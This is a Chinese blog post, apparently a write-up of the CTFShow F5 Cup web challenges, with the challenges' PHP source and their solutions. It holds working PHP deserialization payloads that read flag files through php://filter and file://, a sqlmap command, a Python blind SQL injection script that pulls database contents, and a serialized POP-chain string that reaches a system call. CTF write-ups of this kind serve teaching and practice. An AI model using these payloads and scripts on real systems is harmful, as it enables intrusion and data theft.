【原创】CTFShow—F5杯(web篇)

[huayang]

eazy-unserialize

<?php
include "mysqlDb.class.php";
class ctfshow{
    public $method;
    public $args;
    public $cursor;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
        $this->getCursor();
    }
    function getCursor(){
        global $DEBUG;
        if (!$this->cursor)
            $this->cursor = MySql::getInstance();
        if ($DEBUG) {
            $sql = "DROP TABLE IF  EXISTS  USERINFO";
            $this->cursor->Exec($sql);
            $sql = "CREATE TABLE IF NOT EXISTS USERINFO (username VARCHAR(64),
            password VARCHAR(64),role VARCHAR(256)) CHARACTER SET utf8";
            $this->cursor->Exec($sql);
            $sql = "INSERT INTO USERINFO VALUES ('CTFSHOW', 'CTFSHOW', 'admin'), ('HHD', 'HXD', 'user')";
            $this->cursor->Exec($sql);
        }
    }
    function login() {
        list($username, $password) = func_get_args();
        $sql = sprintf("SELECT * FROM USERINFO WHERE username='%s' AND password='%s'", $username, md5($password));
        $obj = $this->cursor->getRow($sql);
        $data = $obj['role'];
        if ( $data != null ) {
            define('Happy', TRUE);
            $this->loadData($data);
        }
        else {
            $this->byebye("sorry!");
        }
    }
    function closeCursor(){
        $this->cursor = MySql::destroyInstance();
    }
    function lookme() {
        highlight_file(__FILE__);
    }
    function loadData($data) {
        if (substr($data, 0, 2) !== 'O:') {
            return unserialize($data);
        }
        return null;
    }
    function __destruct() {
        $this->getCursor();
        if (in_array($this->method, array("login", "lookme"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        }
        else {
            $this->byebye("fuc***** hacker ?");
        }
        $this->closeCursor();
    }
    function byebye($msg) {
        $this->closeCursor();
        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }
}
class Happy{
    public $file='flag.php';
    function __destruct(){
        if(!empty($this->file)) {
            include $this->file;
        }
    }
}
function ezwaf($data){
    if (preg_match("/ctfshow/",$data)){
        die("Hacker !!!");
    }
    return $data;
}
if(isset($_GET["w_a_n"])) {
    @unserialize(ezwaf($_GET["w_a_n"]));
} else {
    new CTFSHOW("lookme", array());
}

一道极其简单的序列化

前面很多都是烟雾弹,重点在这里

意思直接构造这个Happy这个类就行了

标准形式应该从ctfshow类打下来

但后面的有个waf

其实也是可以绕的但不知咋的访问不了显示“拒绝访问“

过于简单就不说pop了

exp

<?php
class Happy
{
    public $file = 'php://filter/convert.base64-encode/resource=flag.php';
}
echo urlencode(serialize(new Happy()));

这里直接使用file是读不出来的(读出来的师傅说方法呀)

在根目录

这里就可以直接使用file进行读取

<?php
class Happy
{
    public $file = 'file:///flag';
}
echo urlencode(serialize(new Happy()));

eazy-unserialize-revenge

同上

迷惑行为大赏之盲注

进入首页有个忘记密码

点开来康康

当我们输入弱口令admin时

直接说了吧,这不是弱口令

就一sql盲注

先sql打一梭子

通过抓包得知传参为post的username所以sqlmap要设置为post传餐

因为有@符号所以必须加``同时“在shell里面的反引号有特殊作用所以sqlmap只能在win环境下跑

py sqlmap.py -u http://7599bb21-570e-4063-aaf2-3d8e016a1d4a.challenge.ctf.show:8080/forgot.php --data=username=1 -D 测试 -T 15665611612 -C `what@you@want` --dump --batch

再上个师傅写的脚本

import requests
url = 'http://330fde83-d99c-42cc-93c1-29464cecbc89.challenge.ctf.show:8080/forgot.php'
s = 0
for x in range(1, 500):
    data = {
        # 'username': "admin'AND 1=(length((select group_concat(table_name) from information_schema.tables where table_schema='mysql'))={})#".format(x)
        # 'username': "admin'AND 1=(length((Select group_concat(column_name) From information_schema.columns Where table_schema=database() AND table_name='user'))={})#".format(x)
        # 'username': "admin'AND 1=(length((Select group_concat(flagnothere) from user))={})#".format(x)
        # 'username': "admin'AND 1=(length((Select group_concat(passw0rd) from user))={})#".format(x)
        # 'username': "admin'AND 1=(length((select group_concat(schema_name) from information_schema.schemata))={})#".format(x)
        # 1.获得数据库
        # 'username': "admin'AND 1=(length((select HEX(group_concat(schema_name)) from information_schema.schemata))={})#".format(x)
        # 2.获得表名
        # 'username': "admin'AND 1=(length((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),35,2)))={})#".format(x)
        # 3.获得列名
        # 'username': "admin'AND 1=(length((select group_concat(column_name) From information_schema.columns where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),35,2) AND table_name='15665611612'))={})#".format(x)
        # 4.获得内容,因为有@关键字符,用``反引号括起来
        'username': "admin'AND 1=(length((Select HEX(group_concat(`what@you@want`)) from 测试.15665611612))={})#".format(
            x)
    }
    res = requests.post(url=url, data=data)
    if " :P" in res.text:
        s = x + 1
        break
print(s)
flag = ''
for i in range(1, s):
    for j in range(34, 255):
        data = {
            # 'username':"admin'AND 1=(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='mysql'),{},1))={})#".format(i,j)
            # 'username': "admin'AND 1=(ascii(substr((Select group_concat(column_name) From information_schema.columns Where table_schema=database() AND table_name='user'),{},1))={})#".format(i, j)
            # 'username': "admin'AND 1=(ascii(substr((Select group_concat(flagnothere) from user),{},1))={})#".format(i, j)
            # 'username': "admin'AND 1=(ascii(substr((Select group_concat(passw0rd) from user),{},1))={})#".format(i, j)
            # 'username': "admin'AND 1=(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))={})#".format(i, j)
            # 1.获得数据库
            # 'username': "admin'AND 1=(ascii(substr((select HEX(group_concat(schema_name)) from information_schema.schemata),{},1))={})#".format(i, j)
            # 2.获得表名
            # 'username': "admin'AND 1=(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),35,2)),{},1))={})#".format(i, j)
            # 3.获得列名
            # 'username': "admin'AND 1=(ascii(substr((select group_concat(column_name) From information_schema.columns where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),35,2) AND table_name='15665611612'),{},1))={})#".format(i, j)
            # 4.获得内容,因为有@关键字符,用``反引号括起来
            'username': "admin'AND 1=(ascii(substr((Select HEX(group_concat(`what@you@want`)) from `测试`.`15665611612`),{},1))={})#".format(
                i, j)
            # 十六进制转字符串(含中文)的在线解码网址:http://www.bejson.com/convert/ox2str/
        }
        res = requests.post(url=url, data=data)
        # print res.text
        if "P" in res.text:
            flag += chr(j)
            break
    print(flag)
    # print str(i) + flag

Web逃离计划

过于生艹

首先进去是个弱口令

简单的爆一下

user:admin
passwd:admin888

登陆成功后进入源代码

有个php文件进去康康

<?php
error_reporting(0);
if ($_GET['file']){
    $filename = $_GET['file'];
    if ($filename=='logo.png'){
        header("Content-Type:image/png");
        echo file_get_contents("./static/img/logo.png");
    }else{
        ini_set('open_basedir','./');
        if ($filename=='hint.php'){
            echo 'nononono!';
        } else{
            if(preg_match('/read|[\x00-\x2c]| |flag|\.\.|\.\//i', $filename)){
                echo "hacker";
            }else{
                include($filename);
            }
        }
    }
}else{
    highlight_file(__FILE__);
}

看见file_get_contents就是波伪协议

当然,过滤了flag直接读不现实

代码里给了个hint.php的

?file=php://filter/convert.base64-encode/resource=hint.php

给出了三个文件

看见class就知道是序列化

依次读取前两个

ezwaf.php
<?php
function get($data){
    $data = str_replace('forfun', chr(0)."*".chr(0), $data);
    return $data;
}
function checkData($data){
    if(stristr($data, 'username')!==False&&stristr($data, 'password')!==False){
        die("fuc**** hacker!!!\n");
    }
    else{
        return $data;
    }
}
function checkLogData($data){
    if (preg_match("/register|magic|PersonalFunction/",$data)){
        die("fuc**** hacker!!!!\n");
    }
    else{
        return $data;
    }
}

class.php

<?php
error_reporting(0);
class Login{
    protected $user_name;
    protected $pass_word;
    protected $admin;
    public function __construct($username,$password){
        $this->user_name=$username;
        $this->pass_word=$password;
        if ($this->user_name=='admin'&&$this->pass_word=='admin888'){
            $this->admin = 1;
        }else{
            $this->admin = 0;
        }
    }
    public function checkStatus(){
        return $this->admin;
    }
}
class register{
    protected $username;
    protected $password;
    protected $mobile;
    protected $mdPwd;
    public function __construct($username,$password,$mobile){
        $this->username = $username;
        $this->password = $password;
        $this->mobile = $mobile;
    }
    public function __toString(){
        return $this->mdPwd->pwd;
    }
}
class magic{
    protected $username;
    public function __get($key){
        if ($this->username!=='admin'){
            die("what do you do?");
        }
        $this->getFlag($key);
    }
    public function getFlag($key){
        echo $key."</br>";
        system("cat /flagg");
    }
}
class PersonalFunction{
    protected $username;
    protected $password;
    protected $func = array();
    public function __construct($username, $password,$func = "personalData"){
        $this->username = $username;
        $this->password = $password;
        $this->func[$func] = true;
    }
    public function checkFunction(array $funcBars) {
        $retData = null;
        $personalProperties = array_flip([
            'modifyPwd', 'InvitationCode',
            'modifyAvatar', 'personalData',
        ]);
        foreach ($personalProperties as $item => $num){
            foreach ($funcBars as $funcBar => $stat) {
                if (stristr($stat,$item)){
                    $retData = true;
                }
            }
        }
        return $retData;
    }
    public function doFunction($function){
        // TODO: 出题人提示:一个未完成的功能,不用管这个,单纯为了逻辑严密.
        return true;
    }
    public function __destruct(){
        $retData = $this->checkFunction($this->func);
        $this->doFunction($retData);
    }
}

告辞

pop都找不到

贴个师傅们的wp

https://www.shangmayuan.com/a/3ed8c7365588479a83c58b9a.html#web4-web%E9%80%83%E7%A6%BB%E8%AE%A1%E5%88%92

http://www.xl-bit.cn/index.php/CTFshow/127.html

exp

username=forfunforfunforfunforfunforfunforfunforfunforfunforfunforfunforfun&password=aaaa";S:12:"\00*\00pass_word";O:16:"personalFunction":3:{S:11:"\00*\00\75\73ername";S:4:"atao";S:11:"\00*\00\70\61ssword";S:6:"123456";S:7:"\00*\00func";a:1:{i:0;O:8:"Register":4:{S:11:"\00*\00\75\73ername";S:4:"atao";S:11:"\00*\00\70\61ssword";S:6:"123456";S:9:"\00*\00mobile";S:1:"1";S:8:"\00*\00mdPwd";O:5:"Magic":1:{S:11:"\00*\00\75\73ername";S:5:"admin";}}}};s:5:"admin

[/huayang]

==>转载请注明来源哦<==

评论

  1. 头像
    liunano
    Windows Chrome
    6月前
    2021-7-16 22:10:59

    哈哈

  2. 华扬
    华扬 博主
    10月前
    2021-3-22 19:53:58

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇